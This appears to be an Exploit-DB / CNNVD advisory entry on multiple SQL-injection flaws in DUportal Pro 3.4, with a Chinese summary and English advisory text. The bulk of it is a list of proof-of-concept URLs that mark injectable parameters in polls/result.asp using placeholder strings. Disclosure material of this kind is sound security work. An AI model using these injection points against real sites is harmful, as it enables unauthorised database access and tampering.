https://www.exploit-db.com/exploits/25479
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-546

DUwareDUportalPro3.4存在多个SQL注入漏洞，远程攻击者可以通过(1)传到default.asp、cat.asp或detail.asp的nChannel参数，(2)传到search.asp、default.asp、result.asp、cat.asp或detail.asp的iChannel参数(3)传到cat.asp或detail.asp的iCat参数，(4)传到detail.asp或result.asp的iData参数，传到inc_vote.asp的(5)POL_ID，(6)POL_PARENT，(7)POL_CATEGORY，(8)CHA_NAME或(9)CHA_ID参数或传到toppages.asp的(10)tfm_order或(11)tfm_orderby参数，来执行任意SQL命令。是一组不同于CVE-2005-1236的漏洞。

source: http://www.securityfocus.com/bid/13285/info
   
DUportal Pro is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries.
   
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
   
These vulnerabilities are reported to affect DUportal Pro 3.4; earlier versions may also be affected. 

http://www.example.com/dUpro/Businesses/../polls/result.asp?iData=74&iCat=254&iChannel='SQL_INJECTION&nChannel=Polls
http://www.example.com/dUpro/Businesses/../polls/result.asp?iData='SQL_INJECTION&iCat=254&iChannel=15&nChannel=Polls
http://www.example.com/dUpro/Classifieds/../polls/result.asp?iData=74&iCat=254&iChannel='SQL_INJECTION&nChannel=Polls
http://www.example.com/dUpro/Classifieds/../polls/result.asp?iData='SQL_INJECTION&iCat=254&iChannel=15&nChannel=Polls
http://www.example.com/dUpro/Events/../polls/result.asp?iData=74&iCat=254&iChannel='SQL_INJECTION&nChannel=Polls
http://www.example.com/dUpro/events/../polls/result.asp?iData=74&iCat=254&iChannel='SQL_INJECTION&nChannel=Polls
http://www.example.com/dUpro/Events/../polls/result.asp?iData='SQL_INJECTION&iCat=254&iChannel=15&nChannel=Polls
http://www.example.com/dUpro/events/../polls/result.asp?iData='SQL_INJECTION&iCat=254&iChannel=15&nChannel=Polls
http://www.example.com/dUpro/Files/../polls/result.asp?iData=74&iCat=254&iChannel='SQL_INJECTION&nChannel=Polls
http://www.example.com/dUpro/Files/../polls/result.asp?iData='SQL_INJECTION&iCat=254&iChannel=15&nChannel=Polls
http://www.example.com/dUpro/home/../polls/result.asp?iData=74&iCat=254&iChannel='SQL_INJECTION&nChannel=Polls
http://www.example.com/dUpro/home/../polls/result.asp?iData='SQL_INJECTION&iCat=254&iChannel=15&nChannel=Polls
http://www.example.com/dUpro/Pictures/../polls/result.asp?iData=74&iCat=254&iChannel='SQL_INJECTION&nChannel=Polls
http://www.example.com/dUpro/Pictures/../polls/result.asp?iData='SQL_INJECTION&iCat=254&iChannel=15&nChannel=Polls
http://www.example.com/dUpro/polls/../polls/../polls/result.asp?iData=74&iCat=254&iChannel='SQL_INJECTION&nChannel=Polls
http://www.example.com/dUpro/polls/../polls/../polls/result.asp?iData='SQL_INJECTION&iCat=254&iChannel=15&nChannel=Polls
http://www.example.com/dUpro/Topics/../polls/result.asp?iData=74&iCat=254&iChannel='SQL_INJECTION&nChannel=Polls
http://www.example.com/dUpro/Topics/../polls/result.asp?iData='SQL_INJECTION&iCat=254&iChannel=15&nChannel=Polls
http://www.example.com/dUpro/Businesses/../polls/result.asp?iData=74&iCat=254&iChannel=15&nChannel='SQL_ERRORS
http://www.example.com/dUpro/Businesses/../polls/result.asp?iData=74&iCat='SQL_ERRORS&iChannel=15&nChannel=Polls
http://www.example.com/dUpro/Classifieds/../polls/result.asp?iData=74&iCat=254&iChannel=15&nChannel='SQL_ERRORS
http://www.example.com/dUpro/Classifieds/../polls/result.asp?iData=74&iCat='SQL_ERRORS&iChannel=15&nChannel=Polls
http://www.example.com/dUpro/Events/../polls/result.asp?iData=74&iCat=254&iChannel=15&nChannel='SQL_ERRORS
http://www.example.com/dUpro/events/../polls/result.asp?iData=74&iCat=254&iChannel=15&nChannel='SQL_ERRORS
http://www.example.com/dUpro/Events/../polls/result.asp?iData=74&iCat='SQL_ERRORS&iChannel=15&nChannel=Polls
http://www.example.com/dUpro/events/../polls/result.asp?iData=74&iCat='SQL_ERRORS&iChannel=15&nChannel=Polls
http://www.example.com/dUpro/Files/../polls/result.asp?iData=74&iCat=254&iChannel=15&nChannel='SQL_ERRORS
http://www.example.com/dUpro/Files/../polls/result.asp?iData=74&iCat='SQL_ERRORS&iChannel=15&nChannel=Polls
http://www.example.com/dUpro/home/../polls/result.asp?iData=74&iCat=254&iChannel=15&nChannel='SQL_ERRORS
http://www.example.com/dUpro/home/../polls/result.asp?iData=74&iCat='SQL_ERRORS&iChannel=15&nChannel=Polls
http://www.example.com/dUpro/Pictures/../polls/result.asp?iData=74&iCat=254&iChannel=15&nChannel='SQL_ERRORS
http://www.example.com/dUpro/Pictures/../polls/result.asp?iData=74&iCat='SQL_ERRORS&iChannel=15&nChannel=Polls
http://www.example.com/dUpro/polls/../polls/../polls/result.asp?iData=74&iCat=254&iChannel=15&nChannel='SQL_ERRORS
http://www.example.com/dUpro/polls/../polls/../polls/result.asp?iData=74&iCat='SQL_ERRORS&iChannel=15&nChannel=Polls
http://www.example.com/dUpro/Topics/../polls/result.asp?iData=74&iCat=254&iChannel=15&nChannel='SQL_ERRORS
http://www.example.com/dUpro/Topics/../polls/result.asp?iData=74&iCat='SQL_ERRORS&iChannel=15&nChannel=Polls

来源:XF
名称:duportal-multiple-sql-injection(20197)
链接:http://xforce.iss.net/xforce/xfdb/20197
来源:MISC
链接:http://www.securiteam.com/windowsntfocus/5TP0O0AFFQ.html
来源:SECUNIA
名称:15031
链接:http://secunia.com/advisories/15031
来源:XF
名称:duportal-default-cat-sql-injection(30671)
链接:http://xforce.iss.net/xforce/xfdb/30671
来源:BID
名称:13285
链接:http://www.securityfocus.com/bid/13285
来源:BUGTRAQ
名称:20061202[Aria-SecurityTeam]DuWareDuPortalSQLInjectionVuln
链接:http://www.securityfocus.com/archive/1/archive/1/453316/100/0/threaded
来源:BUGTRAQ
名称:20050420DUportalPro3.4hasMANYSqlinjectionandSqlErrors.
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=111401172901705&w;=2